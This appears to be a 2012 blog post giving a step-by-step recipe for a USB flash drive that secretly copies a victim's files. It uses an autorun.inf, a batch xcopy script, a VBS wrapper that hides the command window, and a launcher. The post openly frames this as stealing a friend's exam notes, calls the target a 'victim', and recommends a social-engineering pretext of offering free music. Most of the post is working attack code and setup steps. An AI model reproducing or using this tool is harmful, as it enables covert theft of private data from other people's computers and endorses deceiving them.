Wednesday, July 25, 2012

How to secretly copy files from a computer to a USB Flash drive

Let’s say you and your friend are preparing for an all important exam that is going to decide the course the rest of your life takes. Your friend has some important notes on his computer that he isn’t going to share with you. Your friend is a moron. You need the notes so badly that you are willing to steal from him. He deserves it anyway.
To get the notes you can either break into his house at night, an accomplice keeps you hanging by a rope from the roof while you deliberately copy the files to your flash drive taking care not to let your feet touch the floor. Or you can walk into his room one morning and say with a feigned smile, “Hey, buddy! I have some great new music. Want it?”. Then plug your USB Flash drive into his PC to automatically copy his notes to your pen drive, secretly and silently. Copy the songs you brought to his PC to complete the act.
Sneaky, isn't it? So let us prepare such a sinister USB Flash drive.

STEP 1

Open Notepad (I recommend Notepad++) and copy-paste the following lines.
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
Save this as autorun.inf
The icon line is optional. You can change the icon to your tastes or leave it to the default icon. It’s useful for social engineering purposes like enticing the user to click a file on the drive by making it looks like a game or something.
The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.
The “shell/open command” also acts as a backup in case the user clicks cancel instead of open when prompted. This code will execute when the drive letter is clicked on.

STEP 2

Open Notepad again and copy-paste the following lines
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
@echo off
cls
Save this as file.bat
This file is configured to copy the contents of the current users pictures, favorites, and videos folder to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy.
The first file path "%USERPROFILE%\pictures" – is the target.
The second file path "%drive%\all\My pics" – is the destination.

STEP 3

Open Notepad once again and copy-paste the following line.
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
Save this as invisible.vbs
This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.

STEP 4

Open Notepad one last time and copy-paste the following line.
wscript.exe \invisible.vbs file.bat
Save this as launch.bat
This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.bat so file.bat is run with code from vbs file.

STEP 5

Copy all 4 files created in the above steps and put it on the root of the Flash drive, including the icon file if needed. Also create a folder named “all” where the contents are to be copied automatically. You can call this folder by any name, but then you need to reflect the changes you made in step 2.
This is all that needs to be done. Test the Flash drive on your own computer first before playing it out on your victim. It works flawlessly.

No comments:

Post a Comment